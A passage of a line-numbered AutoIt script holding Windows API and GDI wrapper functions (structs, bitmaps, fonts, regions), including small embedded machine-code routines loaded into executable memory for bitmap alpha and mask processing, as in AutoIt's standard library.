  2417. If __checkerrorarraybounds($adata, $istart, $iend) Then Return SetError(@error + 10, @extended, 0)
  2418. Local $tagstruct = ""
  2419. For $i = $istart To $iend
  2420. $tagstruct &= "wchar[" & (StringLen($adata[$i]) + 1) & "];"
  2421. Next
  2422. Local $tdata = DllStructCreate($tagstruct & "wchar[1]")
  2423. Local $icount = 1
  2424. For $i = $istart To $iend
  2425. DllStructSetData($tdata, $icount, $adata[$i])
  2426. $icount += 1
  2427. Next
  2428. DllStructSetData($tdata, $icount, ChrW(0))
  2429. Return $tdata
  2430. EndFunc
  2431.  
  2432. Func _winapi_createmargins($ileftwidth, $irightwidth, $itopheight, $ibottomheight)
  2433. Local $tmargins = DllStructCreate($tagmargins)
  2434. DllStructSetData($tmargins, 1, $ileftwidth)
  2435. DllStructSetData($tmargins, 2, $irightwidth)
  2436. DllStructSetData($tmargins, 3, $itopheight)
  2437. DllStructSetData($tmargins, 4, $ibottomheight)
  2438. Return $tmargins
  2439. EndFunc
  2440.  
  2441. Func _winapi_createpoint($ix, $iy)
  2442. Local $tpoint = DllStructCreate($tagpoint)
  2443. DllStructSetData($tpoint, 1, $ix)
  2444. DllStructSetData($tpoint, 2, $iy)
  2445. Return $tpoint
  2446. EndFunc
  2447.  
  2448. Func _winapi_createrect($ileft, $itop, $iright, $ibottom)
  2449. Local $trect = DllStructCreate($tagrect)
  2450. DllStructSetData($trect, 1, $ileft)
  2451. DllStructSetData($trect, 2, $itop)
  2452. DllStructSetData($trect, 3, $iright)
  2453. DllStructSetData($trect, 4, $ibottom)
  2454. Return $trect
  2455. EndFunc
  2456.  
  2457. Func _winapi_createrectex($ix, $iy, $iwidth, $iheight)
  2458. Local $trect = DllStructCreate($tagrect)
  2459. DllStructSetData($trect, 1, $ix)
  2460. DllStructSetData($trect, 2, $iy)
  2461. DllStructSetData($trect, 3, $ix + $iwidth)
  2462. DllStructSetData($trect, 4, $iy + $iheight)
  2463. Return $trect
  2464. EndFunc
  2465.  
  2466. Func _winapi_createsize($iwidth, $iheight)
  2467. Local $tsize = DllStructCreate($tagsize)
  2468. DllStructSetData($tsize, 1, $iwidth)
  2469. DllStructSetData($tsize, 2, $iheight)
  2470. Return $tsize
  2471. EndFunc
  2472.  
  2473. Func _winapi_copystruct($tstruct, $sstruct = "")
  2474. Local $isize = DllStructGetSize($tstruct)
  2475. If NOT $isize Then Return SetError(1, 0, 0)
  2476. Local $tresult
  2477. If NOT StringStripWS($sstruct, $str_stripleading + $str_striptrailing + $str_stripspaces) Then
  2478. $tresult = DllStructCreate("byte[" & $isize & "]")
  2479. Else
  2480. $tresult = DllStructCreate($sstruct)
  2481. EndIf
  2482. If DllStructGetSize($tresult) < $isize Then Return SetError(2, 0, 0)
  2483. _winapi_movememory($tresult, $tstruct, $isize)
  2484. Return $tresult
  2485. EndFunc
  2486.  
  2487. Func _winapi_getextended()
  2488. Return $__g_vext
  2489. EndFunc
  2490.  
  2491. Func _winapi_getmousepos($btoclient = False, $hwnd = 0)
  2492. Local $imode = Opt("MouseCoordMode", 1)
  2493. Local $apos = MouseGetPos()
  2494. Opt("MouseCoordMode", $imode)
  2495. Local $tpoint = DllStructCreate($tagpoint)
  2496. DllStructSetData($tpoint, "X", $apos[0])
  2497. DllStructSetData($tpoint, "Y", $apos[1])
  2498. If $btoclient AND NOT _winapi_screentoclient($hwnd, $tpoint) Then Return SetError(@error + 20, @extended, 0)
  2499. Return $tpoint
  2500. EndFunc
  2501.  
  2502. Func _winapi_getmouseposx($btoclient = False, $hwnd = 0)
  2503. Local $tpoint = _winapi_getmousepos($btoclient, $hwnd)
  2504. If @error Then Return SetError(@error, @extended, 0)
  2505. Return DllStructGetData($tpoint, "X")
  2506. EndFunc
  2507.  
  2508. Func _winapi_getmouseposy($btoclient = False, $hwnd = 0)
  2509. Local $tpoint = _winapi_getmousepos($btoclient, $hwnd)
  2510. If @error Then Return SetError(@error, @extended, 0)
  2511. Return DllStructGetData($tpoint, "Y")
  2512. EndFunc
  2513.  
  2514. Func _winapi_muldiv($inumber, $inumerator, $idenominator)
  2515. Local $aresult = DllCall("kernel32.dll", "int", "MulDiv", "int", $inumber, "int", $inumerator, "int", $idenominator)
  2516. If @error Then Return SetError(@error, @extended, -1)
  2517. Return $aresult[0]
  2518. EndFunc
  2519.  
  2520. Func _winapi_playsound($ssound, $iflags = $snd_system_nostop, $hinstance = 0)
  2521. Local $stypeofsound = "ptr"
  2522. If $ssound Then
  2523. If IsString($ssound) Then
  2524. $stypeofsound = "wstr"
  2525. EndIf
  2526. Else
  2527. $ssound = 0
  2528. $iflags = 0
  2529. EndIf
  2530. Local $aret = DllCall("winmm.dll", "bool", "PlaySoundW", $stypeofsound, $ssound, "handle", $hinstance, "dword", $iflags)
  2531. If @error Then Return SetError(@error, @extended, False)
  2532. Return $aret[0]
  2533. EndFunc
  2534.  
  2535. Func _winapi_stringlena(Const ByRef $tstring)
  2536. Local $aresult = DllCall("kernel32.dll", "int", "lstrlenA", "struct*", $tstring)
  2537. If @error Then Return SetError(@error, @extended, 0)
  2538. Return $aresult[0]
  2539. EndFunc
  2540.  
  2541. Func _winapi_stringlenw(Const ByRef $tstring)
  2542. Local $aresult = DllCall("kernel32.dll", "int", "lstrlenW", "struct*", $tstring)
  2543. If @error Then Return SetError(@error, @extended, 0)
  2544. Return $aresult[0]
  2545. EndFunc
  2546.  
  2547. Func _winapi_structtoarray(ByRef $tstruct, $iitems = 0)
  2548. Local $isize = 2 * Floor(DllStructGetSize($tstruct) / 2)
  2549. Local $pstruct = DllStructGetPtr($tstruct)
  2550. If NOT $isize OR NOT $pstruct Then Return SetError(1, 0, 0)
  2551. Local $tdata, $ilength, $ioffset = 0
  2552. Local $aresult[101] = [0]
  2553. While 1
  2554. $ilength = _winapi_strlen($pstruct + $ioffset)
  2555. If NOT $ilength Then
  2556. ExitLoop
  2557. EndIf
  2558. If 2 * (1 + $ilength) + $ioffset > $isize Then Return SetError(3, 0, 0)
  2559. $tdata = DllStructCreate("wchar[" & (1 + $ilength) & "]", $pstruct + $ioffset)
  2560. If @error Then Return SetError(@error + 10, 0, 0)
  2561. __inc($aresult)
  2562. $aresult[$aresult[0]] = DllStructGetData($tdata, 1)
  2563. If $aresult[0] = $iitems Then
  2564. ExitLoop
  2565. EndIf
  2566. $ioffset += 2 * (1 + $ilength)
  2567. If $ioffset >= $isize Then Return SetError(3, 0, 0)
  2568. WEnd
  2569. If NOT $aresult[0] Then Return SetError(2, 0, 0)
  2570. __inc($aresult, -1)
  2571. Return $aresult
  2572. EndFunc
  2573.  
  2574. Func _winapi_unionstruct($tstruct1, $tstruct2, $sstruct = "")
  2575. Local $asize[2] = [DllStructGetSize($tstruct1), DllStructGetSize($tstruct2)]
  2576. If NOT $asize[0] OR NOT $asize[1] Then Return SetError(1, 0, 0)
  2577. Local $tresult
  2578. If NOT StringStripWS($sstruct, $str_stripleading + $str_striptrailing + $str_stripspaces) Then
  2579. $tresult = DllStructCreate("byte[" & ($asize[0] + $asize[1]) & "]")
  2580. Else
  2581. $tresult = DllStructCreate($sstruct)
  2582. EndIf
  2583. If DllStructGetSize($tresult) < ($asize[0] + $asize[1]) Then Return SetError(2, 0, 0)
  2584. _winapi_movememory($tresult, $tstruct1, $asize[0])
  2585. _winapi_movememory(DllStructGetPtr($tresult) + $asize[0], $tstruct2, $asize[1])
  2586. Return $tresult
  2587. EndFunc
  2588.  
  2589. #EndRegion Public Functions
  2590. #Region Global Variables and Constants
  2591. Global Const $tagbitmap = "struct;long bmType;long bmWidth;long bmHeight;long bmWidthBytes;ushort bmPlanes;ushort bmBitsPixel;ptr bmBits;endstruct"
  2592. Global Const $tagbitmapv5header = "struct;dword bV5Size;long bV5Width;long bV5Height;ushort bV5Planes;ushort bV5BitCount;dword bV5Compression;dword bV5SizeImage;long bV5XPelsPerMeter;long bV5YPelsPerMeter;dword bV5ClrUsed;dword bV5ClrImportant;dword bV5RedMask;dword bV5GreenMask;dword bV5BlueMask;dword bV5AlphaMask;dword bV5CSType;int bV5Endpoints[9];dword bV5GammaRed;dword bV5GammaGreen;dword bV5GammaBlue;dword bV5Intent;dword bV5ProfileData;dword bV5ProfileSize;dword bV5Reserved;endstruct"
  2593. Global Const $tagdibsection = $tagbitmap & ";" & $tagbitmapinfoheader & ";dword dsBitfields[3];ptr dshSection;dword dsOffset"
  2594. Global Const $tmpf_fixed_pitch = 1
  2595. Global Const $tmpf_vector = 2
  2596. Global Const $tmpf_truetype = 4
  2597. Global Const $tmpf_device = 8
  2598. Global Const $__winapiconstant_fw_normal = 400
  2599. Global Const $__winapiconstant_default_charset = 1
  2600. Global Const $__winapiconstant_out_default_precis = 0
  2601. Global Const $__winapiconstant_clip_default_precis = 0
  2602. Global Const $__winapiconstant_default_quality = 0
  2603. #EndRegion Global Variables and Constants
  2604. #Region Functions list
  2605. #EndRegion Functions list
  2606. #Region Public Functions
  2607.  
  2608. Func _winapi_bitblt($hdestdc, $ixdest, $iydest, $iwidth, $iheight, $hsrcdc, $ixsrc, $iysrc, $irop)
  2609. Local $aresult = DllCall("gdi32.dll", "bool", "BitBlt", "handle", $hdestdc, "int", $ixdest, "int", $iydest, "int", $iwidth, "int", $iheight, "handle", $hsrcdc, "int", $ixsrc, "int", $iysrc, "dword", $irop)
  2610. If @error Then Return SetError(@error, @extended, False)
  2611. Return $aresult[0]
  2612. EndFunc
  2613.  
  2614. Func _winapi_combinergn($hrgndest, $hrgnsrc1, $hrgnsrc2, $icombinemode)
  2615. Local $aresult = DllCall("gdi32.dll", "int", "CombineRgn", "handle", $hrgndest, "handle", $hrgnsrc1, "handle", $hrgnsrc2, "int", $icombinemode)
  2616. If @error Then Return SetError(@error, @extended, 0)
  2617. Return $aresult[0]
  2618. EndFunc
  2619.  
  2620. Func _winapi_copybitmap($hbitmap)
  2621. $hbitmap = _winapi_copyimage($hbitmap, 0, 0, 0, 8192)
  2622. Return SetError(@error, @extended, $hbitmap)
  2623. EndFunc
  2624.  
  2625. Func _winapi_copyimage($himage, $itype = 0, $ixdesiredpixels = 0, $iydesiredpixels = 0, $iflags = 0)
  2626. Local $aret = DllCall("user32.dll", "handle", "CopyImage", "handle", $himage, "uint", $itype, "int", $ixdesiredpixels, "int", $iydesiredpixels, "uint", $iflags)
  2627. If @error Then Return SetError(@error, @extended, 0)
  2628. Return $aret[0]
  2629. EndFunc
  2630.  
  2631. Func _winapi_createandbitmap($hbitmap)
  2632. Local $ierror = 0, $hdib = 0
  2633. $hbitmap = _winapi_copybitmap($hbitmap)
  2634. If NOT $hbitmap Then Return SetError(@error + 20, @extended, 0)
  2635. Do
  2636. Local $atdib[2]
  2637. $atdib[0] = DllStructCreate($tagdibsection)
  2638. If (NOT _winapi_getobject($hbitmap, DllStructGetSize($atdib[0]), $atdib[0])) OR (DllStructGetData($atdib[0], "bmBitsPixel") <> 32) OR (DllStructGetData($atdib[0], "biCompression")) Then
  2639. $ierror = 10
  2640. ExitLoop
  2641. EndIf
  2642. $atdib[1] = DllStructCreate($tagbitmap)
  2643. $hdib = _winapi_createdib(DllStructGetData($atdib[0], "bmWidth"), DllStructGetData($atdib[0], "bmHeight"), 1)
  2644. If NOT _winapi_getobject($hdib, DllStructGetSize($atdib[1]), $atdib[1]) Then
  2645. $ierror = 11
  2646. ExitLoop
  2647. EndIf
  2648. Local $aret = DllCall("user32.dll", "lresult", "CallWindowProc", "ptr", __andproc(), "ptr", 0, "uint", 0, "wparam", DllStructGetPtr($atdib[0]), "lparam", DllStructGetPtr($atdib[1]))
  2649. If @error Then
  2650. $ierror = @error
  2651. ExitLoop
  2652. EndIf
  2653. If NOT $aret[0] Then
  2654. $ierror = 12
  2655. ExitLoop
  2656. EndIf
  2657. $ierror = 0
  2658. Until 1
  2659. _winapi_deleteobject($hbitmap)
  2660. If $ierror Then
  2661. If $hdib Then
  2662. _winapi_deleteobject($hdib)
  2663. EndIf
  2664. $hdib = 0
  2665. EndIf
  2666. Return SetError($ierror, 0, $hdib)
  2667. EndFunc
  2668.  
  2669. Func _winapi_createbitmap($iwidth, $iheight, $iplanes = 1, $ibitsperpel = 1, $pbits = 0)
  2670. Local $aresult = DllCall("gdi32.dll", "handle", "CreateBitmap", "int", $iwidth, "int", $iheight, "uint", $iplanes, "uint", $ibitsperpel, "struct*", $pbits)
  2671. If @error Then Return SetError(@error, @extended, 0)
  2672. Return $aresult[0]
  2673. EndFunc
  2674.  
  2675. Func _winapi_createcompatiblebitmap($hdc, $iwidth, $iheight)
  2676. Local $aresult = DllCall("gdi32.dll", "handle", "CreateCompatibleBitmap", "handle", $hdc, "int", $iwidth, "int", $iheight)
  2677. If @error Then Return SetError(@error, @extended, 0)
  2678. Return $aresult[0]
  2679. EndFunc
  2680.  
  2681. Func _winapi_createdib($iwidth, $iheight, $ibitsperpel = 32, $tcolortable = 0, $icolorcount = 0)
  2682. Local $argbq[2], $icolors, $tagrgbq
  2683. Switch $ibitsperpel
  2684. Case 1
  2685. $icolors = 2
  2686. Case 4
  2687. $icolors = 16
  2688. Case 8
  2689. $icolors = 256
  2690. Case Else
  2691. $icolors = 0
  2692. EndSwitch
  2693. If $icolors Then
  2694. If NOT IsDllStruct($tcolortable) Then
  2695. Switch $ibitsperpel
  2696. Case 1
  2697. $argbq[0] = 0
  2698. $argbq[1] = 16777215
  2699. $tcolortable = _winapi_createdibcolortable($argbq)
  2700. Case Else
  2701. EndSwitch
  2702. Else
  2703. If $icolors > $icolorcount Then
  2704. $icolors = $icolorcount
  2705. EndIf
  2706. If (NOT $icolors) OR ((4 * $icolors) > DllStructGetSize($tcolortable)) Then
  2707. Return SetError(20, 0, 0)
  2708. EndIf
  2709. EndIf
  2710. $tagrgbq = ";dword aRGBQuad[" & $icolors & "]"
  2711. Else
  2712. $tagrgbq = ""
  2713. EndIf
  2714. Local $tbitmapinfo = DllStructCreate($tagbitmapinfoheader & $tagrgbq)
  2715. DllStructSetData($tbitmapinfo, "biSize", 40)
  2716. DllStructSetData($tbitmapinfo, "biWidth", $iwidth)
  2717. DllStructSetData($tbitmapinfo, "biHeight", $iheight)
  2718. DllStructSetData($tbitmapinfo, "biPlanes", 1)
  2719. DllStructSetData($tbitmapinfo, "biBitCount", $ibitsperpel)
  2720. DllStructSetData($tbitmapinfo, "biCompression", 0)
  2721. DllStructSetData($tbitmapinfo, "biSizeImage", 0)
  2722. DllStructSetData($tbitmapinfo, "biXPelsPerMeter", 0)
  2723. DllStructSetData($tbitmapinfo, "biYPelsPerMeter", 0)
  2724. DllStructSetData($tbitmapinfo, "biClrUsed", $icolors)
  2725. DllStructSetData($tbitmapinfo, "biClrImportant", 0)
  2726. If $icolors Then
  2727. If IsDllStruct($tcolortable) Then
  2728. _winapi_movememory(DllStructGetPtr($tbitmapinfo, "aRGBQuad"), $tcolortable, 4 * $icolors)
  2729. Else
  2730. _winapi_zeromemory(DllStructGetPtr($tbitmapinfo, "aRGBQuad"), 4 * $icolors)
  2731. EndIf
  2732. EndIf
  2733. Local $hbitmap = _winapi_createdibsection(0, $tbitmapinfo, 0, $__g_vext)
  2734. If NOT $hbitmap Then Return SetError(@error, @extended, 0)
  2735. Return $hbitmap
  2736. EndFunc
  2737.  
  2738. Func _winapi_createdibsection($hdc, $tbitmapinfo, $iusage, ByRef $pbits, $hsection = 0, $ioffset = 0)
  2739. $pbits = 0
  2740. Local $aret = DllCall("gdi32.dll", "handle", "CreateDIBSection", "handle", $hdc, "struct*", $tbitmapinfo, "uint", $iusage, "ptr*", 0, "handle", $hsection, "dword", $ioffset)
  2741. If @error OR NOT $aret[0] Then Return SetError(@error, @extended, 0)
  2742. $pbits = $aret[4]
  2743. Return $aret[0]
  2744. EndFunc
  2745.  
  2746. Func _winapi_createdibcolortable(Const ByRef $acolortable, $istart = 0, $iend = -1)
  2747. If __checkerrorarraybounds($acolortable, $istart, $iend) Then Return SetError(@error + 10, @extended, 0)
  2748. Local $tcolortable = DllStructCreate("dword[" & ($iend - $istart + 1) & "]")
  2749. Local $icount = 1
  2750. For $i = $istart To $iend
  2751. DllStructSetData($tcolortable, 1, _winapi_switchcolor(__rgb($acolortable[$i])), $icount)
  2752. $icount += 1
  2753. Next
  2754. Return $tcolortable
  2755. EndFunc
  2756.  
  2757. Func _winapi_createfont($iheight, $iwidth, $iescape = 0, $iorientn = 0, $iweight = $__winapiconstant_fw_normal, $bitalic = False, $bunderline = False, $bstrikeout = False, $icharset = $__winapiconstant_default_charset, $ioutputprec = $__winapiconstant_out_default_precis, $iclipprec = $__winapiconstant_clip_default_precis, $iquality = $__winapiconstant_default_quality, $ipitch = 0, $sface = "Arial")
  2758. Local $aresult = DllCall("gdi32.dll", "handle", "CreateFontW", "int", $iheight, "int", $iwidth, "int", $iescape, "int", $iorientn, "int", $iweight, "dword", $bitalic, "dword", $bunderline, "dword", $bstrikeout, "dword", $icharset, "dword", $ioutputprec, "dword", $iclipprec, "dword", $iquality, "dword", $ipitch, "wstr", $sface)
  2759. If @error Then Return SetError(@error, @extended, 0)
  2760. Return $aresult[0]
  2761. EndFunc
  2762.  
  2763. Func _winapi_createfontindirect($tlogfont)
  2764. Local $aresult = DllCall("gdi32.dll", "handle", "CreateFontIndirectW", "struct*", $tlogfont)
  2765. If @error Then Return SetError(@error, @extended, 0)
  2766. Return $aresult[0]
  2767. EndFunc
  2768.  
  2769. Func _winapi_createrectrgn($ileftrect, $itoprect, $irightrect, $ibottomrect)
  2770. Local $aresult = DllCall("gdi32.dll", "handle", "CreateRectRgn", "int", $ileftrect, "int", $itoprect, "int", $irightrect, "int", $ibottomrect)
  2771. If @error Then Return SetError(@error, @extended, 0)
  2772. Return $aresult[0]
  2773. EndFunc
  2774.  
  2775. Func _winapi_createroundrectrgn($ileftrect, $itoprect, $irightrect, $ibottomrect, $iwidthellipse, $iheightellipse)
  2776. Local $aresult = DllCall("gdi32.dll", "handle", "CreateRoundRectRgn", "int", $ileftrect, "int", $itoprect, "int", $irightrect, "int", $ibottomrect, "int", $iwidthellipse, "int", $iheightellipse)
  2777. If @error Then Return SetError(@error, @extended, 0)
  2778. Return $aresult[0]
  2779. EndFunc
  2780.  
  2781. Func _winapi_createsolidbrush($icolor)
  2782. Local $aresult = DllCall("gdi32.dll", "handle", "CreateSolidBrush", "INT", $icolor)
  2783. If @error Then Return SetError(@error, @extended, 0)
  2784. Return $aresult[0]
  2785. EndFunc
  2786.  
  2787. Func _winapi_getbitmapdimension($hbitmap)
  2788. Local $tobj = DllStructCreate($tagbitmap)
  2789. Local $aret = DllCall("gdi32.dll", "int", "GetObject", "handle", $hbitmap, "int", DllStructGetSize($tobj), "struct*", $tobj)
  2790. If @error OR NOT $aret[0] Then Return SetError(@error + 10, @extended, 0)
  2791. Return _winapi_createsize(DllStructGetData($tobj, "bmWidth"), DllStructGetData($tobj, "bmHeight"))
  2792. EndFunc
  2793.  
  2794. Func _winapi_getsyscolorbrush($iindex)
  2795. Local $aresult = DllCall("user32.dll", "handle", "GetSysColorBrush", "int", $iindex)
  2796. If @error Then Return SetError(@error, @extended, 0)
  2797. Return $aresult[0]
  2798. EndFunc
  2799.  
  2800. Func _winapi_gettextextentpoint32($hdc, $stext)
  2801. Local $tsize = DllStructCreate($tagsize)
  2802. Local $isize = StringLen($stext)
  2803. Local $aret = DllCall("gdi32.dll", "bool", "GetTextExtentPoint32W", "handle", $hdc, "wstr", $stext, "int", $isize, "struct*", $tsize)
  2804. If @error OR NOT $aret[0] Then Return SetError(@error + 10, @extended, 0)
  2805. Return $tsize
  2806. EndFunc
  2807.  
  2808. Func _winapi_gettextmetrics($hdc)
  2809. Local $ttextmetric = DllStructCreate($tagtextmetric)
  2810. Local $aret = DllCall("gdi32.dll", "bool", "GetTextMetricsW", "handle", $hdc, "struct*", $ttextmetric)
  2811. If @error OR NOT $aret[0] Then Return SetError(@error + 10, @extended, 0)
  2812. Return $ttextmetric
  2813. EndFunc
  2814.  
  2815. Func _winapi_getwindowrgn($hwnd, $hrgn)
  2816. Local $aresult = DllCall("user32.dll", "int", "GetWindowRgn", "hwnd", $hwnd, "handle", $hrgn)
  2817. If @error Then Return SetError(@error, @extended, 0)
  2818. Return $aresult[0]
  2819. EndFunc
  2820.  
  2821. Func _winapi_isalphabitmap($hbitmap)
  2822. $hbitmap = _winapi_copybitmap($hbitmap)
  2823. If NOT $hbitmap Then Return SetError(@error + 20, @extended, 0)
  2824. Local $aret, $ierror = 0
  2825. Do
  2826. Local $tdib = DllStructCreate($tagdibsection)
  2827. If (NOT _winapi_getobject($hbitmap, DllStructGetSize($tdib), $tdib)) OR (DllStructGetData($tdib, "bmBitsPixel") <> 32) OR (DllStructGetData($tdib, "biCompression")) Then
  2828. $ierror = 1
  2829. ExitLoop
  2830. EndIf
  2831. $aret = DllCall("user32.dll", "int", "CallWindowProc", "ptr", __alphaproc(), "ptr", 0, "uint", 0, "struct*", $tdib, "ptr", 0)
  2832. If @error OR ($aret[0] = -1) Then
  2833. $ierror = @error + 10
  2834. ExitLoop
  2835. EndIf
  2836. Until 1
  2837. _winapi_deleteobject($hbitmap)
  2838. If $ierror Then Return SetError($ierror, 0, 0)
  2839. Return $aret[0]
  2840. EndFunc
  2841.  
  2842. Func _winapi_ptinrect(ByRef $trect, ByRef $tpoint)
  2843. Local $aresult = DllCall("user32.dll", "bool", "PtInRect", "struct*", $trect, "struct", $tpoint)
  2844. If @error Then Return SetError(@error, @extended, False)
  2845. Return $aresult[0]
  2846. EndFunc
  2847.  
  2848. Func _winapi_redrawwindow($hwnd, $trect = 0, $hregion = 0, $iflags = 5)
  2849. Local $aresult = DllCall("user32.dll", "bool", "RedrawWindow", "hwnd", $hwnd, "struct*", $trect, "handle", $hregion, "uint", $iflags)
  2850. If @error Then Return SetError(@error, @extended, False)
  2851. Return $aresult[0]
  2852. EndFunc
  2853.  
  2854. Func _winapi_setwindowrgn($hwnd, $hrgn, $bredraw = True)
  2855. Local $aresult = DllCall("user32.dll", "int", "SetWindowRgn", "hwnd", $hwnd, "handle", $hrgn, "bool", $bredraw)
  2856. If @error Then Return SetError(@error, @extended, False)
  2857. Return $aresult[0]
  2858. EndFunc
  2859.  
  2860. #EndRegion Public Functions
  2861. #Region Embedded DLL Functions
  2862.  
  2863. Func __alphaproc()
  2864. Static $pproc = 0
  2865. If NOT $pproc Then
  2866. If @AutoItX64 Then
  2867. $pproc = __init(Binary("0x48894C240848895424104C894424184C894C24205541574831C050504883EC28" & "48837C24600074054831C0EB0748C7C0010000004821C0751F488B6C24604883" & "7D180074054831C0EB0748C7C0010000004821C07502EB0948C7C001000000EB" & "034831C04821C0740C48C7C0FFFFFFFF4863C0EB6F48C744242800000000488B" & "6C24604C637D04488B6C2460486345084C0FAFF849C1E7024983C7FC4C3B7C24" & "287C36488B6C24604C8B7D184C037C24284983C7034C897C2430488B6C243080" & "7D0000740C48C7C0010000004863C0EB1348834424280471A54831C04863C0EB" & "034831C04883C438415F5DC3"))
  2868. Else
  2869. $pproc = __init(Binary("0x555331C05050837C241C00740431C0EB05B80100000021C075198B6C241C837D" & "1400740431C0EB05B80100000021C07502EB07B801000000EB0231C021C07407" & "B8FFFFFFFFEB4FC70424000000008B6C241C8B5D048B6C241C0FAF5D08C1E302" & "83C3FC3B1C247C288B6C241C8B5D14031C2483C303895C24048B6C2404807D00" & "007407B801000000EB0C8304240471BE31C0EB0231C083C4085B5DC21000"))
  2870. EndIf
  2871. EndIf
  2872. Return $pproc
  2873. EndFunc
  2874.  
  2875. Func __andproc()
  2876. Static $pproc = 0
  2877. If NOT $pproc Then
  2878. If @AutoItX64 Then
  2879. $pproc = __init(Binary("0x48894C240848895424104C894424184C894C2420554157415648C7C009000000" & "4883EC0848C704240000000048FFC875EF4883EC284883BC24A0000000007405" & "4831C0EB0748C7C0010000004821C00F85840000004883BC24A8000000007405" & "4831C0EB0748C7C0010000004821C07555488BAC24A000000048837D18007405" & "4831C0EB0748C7C0010000004821C07522488BAC24A800000048837D18007405" & "4831C0EB0748C7C0010000004821C07502EB0948C7C001000000EB034831C048" & "21C07502EB0948C7C001000000EB034831C04821C07502EB0948C7C001000000" & "EB034831C04821C0740B4831C04863C0E9D701000048C74424280000000048C7" & "44243000000000488BAC24A00000004C637D0849FFCF4C3B7C24300F8C9C0100" & "0048C74424380000000048C74424400000000048C744244800000000488BAC24" & "A00000004C637D0449FFCF4C3B7C24480F8CDB000000488BAC24A00000004C8B" & "7D184C037C24284983C7034C897C2450488B6C2450807D000074264C8B7C2440" & "4C8B74243849F7DE4983C61F4C89F148C7C00100000048D3E04909C74C897C24" & "4048FF4424384C8B7C24384983FF1F7E6F4C8B7C244049F7D74C897C244048C7" & "442458180000004831C0483B4424587F3D488BAC24A80000004C8B7D184C037C" & "24604C897C24504C8B7C2440488B4C245849D3FF4C89F850488B6C2458588845" & "0048FF4424604883442458F871B948C74424380000000048C744244000000000" & "48834424280448FF4424480F810BFFFFFF48837C24380074794C8B7C244049F7" & "D74C8B74243849F7DE4983C6204C89F148C7C0FFFFFFFF48D3E04921C74C897C" & "244048C7442458180000004831C0483B4424587F3D488BAC24A80000004C8B7D" & "184C037C24604C897C24504C8B7C2440488B4C245849D3FF4C89F850488B6C24" & "585888450048FF4424604883442458F871B948FF4424300F814AFEFFFF48C7C0" & "010000004863C0EB034831C04883C470415E415F5DC3"))
  2880. Else
  2881. $pproc = __init(Binary("0x555357BA0800000083EC04C70424000000004A75F3837C243800740431C0EB05" & "B80100000021C07562837C243C00740431C0EB05B80100000021C0753F8B6C24" & "38837D1400740431C0EB05B80100000021C075198B6C243C837D1400740431C0" & "EB05B80100000021C07502EB07B801000000EB0231C021C07502EB07B8010000" & "00EB0231C021C07502EB07B801000000EB0231C021C0740731C0E969010000C7" & "042400000000C7442404000000008B6C24388B5D084B3B5C24040F8C3F010000" & "C744240800000000C744240C00000000C7442410000000008B6C24388B5D044B" & "3B5C24100F8CA90000008B6C24388B5D14031C2483C303895C24148B6C241480" & "7D0000741C8B5C240C8B7C2408F7DF83C71F89F9B801000000D3E009C3895C24" & "0CFF4424088B5C240883FB1F7E578B5C240CF7D3895C240CC744241818000000" & "31C03B4424187F2D8B6C243C8B5D14035C241C895C24148B5C240C8B4C2418D3" & "FB538B6C241858884500FF44241C83442418F871CBC744240800000000C74424" & "0C0000000083042404FF4424100F8145FFFFFF837C240800745B8B5C240CF7D3" & "8B7C2408F7DF83C72089F9B8FFFFFFFFD3E021C3895C240CC744241818000000" & "31C03B4424187F2D8B6C243C8B5D14035C241C895C24148B5C240C8B4C2418D3" & "FB538B6C241858884500FF44241C83442418F871CBFF4424040F81AFFEFFFFB8" & "01000000EB0231C083C4205F5B5DC21000"))
  2882. EndIf
  2883. EndIf
  2884. Return $pproc
  2885. EndFunc
  2886.  
  2887. Func __xorproc()
  2888. Static $pproc = 0
  2889. If NOT $pproc Then
  2890. If @AutoItX64 Then
  2891. $pproc = __init(Binary("0x48894C240848895424104C894424184C894C24205541574831C050504883EC28" & "48837C24600074054831C0EB0748C7C0010000004821C0751B48837C24680074" & "054831C0EB0748C7C0010000004821C07502EB0948C7C001000000EB034831C0" & "4821C074084831C04863C0EB7748C7442428000000004C637C24584983C7FC4C" & "3B7C24287C4F4C8B7C24604C037C24284C897C2430488B6C2430807D00007405" & "4831C0EB0748C7C0010000004821C0741C4C8B7C24684C037C24284983C7034C" & "897C2430488B6C2430C64500FF48834424280471A148C7C0010000004863C0EB" & "034831C04883C438415F5DC3"))
  2892. Else
  2893. $pproc = __init(Binary("0x555331C05050837C241C00740431C0EB05B80100000021C07516837C24200074" & "0431C0EB05B80100000021C07502EB07B801000000EB0231C021C0740431C0EB" & "5AC70424000000008B5C241883C3FC3B1C247C3E8B5C241C031C24895C24048B" & "6C2404807D0000740431C0EB05B80100000021C074168B5C2420031C2483C303" & "895C24048B6C2404C64500FF8304240471B6B801000000EB0231C083C4085B5D" & "C21000"))
  2894. EndIf
  2895. EndIf
  2896. Return $pproc
  2897. EndFunc
  2898.  
  2899. #EndRegion Embedded DLL Functions
  2900. #Region Internal Functions
  2901.  
  2902. Func __init($ddata)
  2903. Local $ilength = BinaryLen($ddata)
  2904. Local $aret = DllCall("kernel32.dll", "ptr", "VirtualAlloc", "ptr", 0, "ulong_ptr", $ilength, "dword", 4096, "dword", 64)
  2905. If @error OR NOT $aret[0] Then __fatalexit(1, "Error allocating memory.")
  2906. Local $tdata = DllStructCreate("byte[" & $ilength & "]", $aret[0])
  2907. DllStructSetData($tdata, 1, $ddata)
  2908. Return $aret[0]
  2909. EndFunc
  2910.  
  2911. #EndRegion Internal Functions
  2912. #Region Global Variables and Constants
  2913. Global Const $di_mask = 1
  2914. Global Const $di_image = 2
  2915. Global Const $di_normal = 3
  2916. Global Const $di_compat = 4
  2917. Global Const $di_defaultsize = 8
  2918. Global Const $di_nomirror = 16
  2919. Global Const $display_device_attached_to_desktop = 1
  2920. Global Const $display_device_multi_driver = 2
  2921. Global Const $display_device_primary_device = 4
  2922. Global Const $display_device_mirroring_driver = 8
  2923. Global Const $display_device_vga_compatible = 16
  2924. Global Const $display_device_removable = 32
  2925. Global Const $display_device_disconnect = 33554432
  2926. Global Const $display_device_remote = 67108864
  2927. Global Const $display_device_modespruned = 134217728
  2928. #EndRegion Global Variables and Constants
  2929. #Region Functions list
  2930. #EndRegion Functions list
  2931. #Region Public Functions
  2932.  
  2933. Func _winapi_createcompatibledc($hdc)
  2934. Local $aresult = DllCall("gdi32.dll", "handle", "CreateCompatibleDC", "handle", $hdc)
  2935. If @error Then Return SetError(@error, @extended, 0)
  2936. Return $aresult[0]
  2937. EndFunc
  2938.  
  2939. Func _winapi_deletedc($hdc)
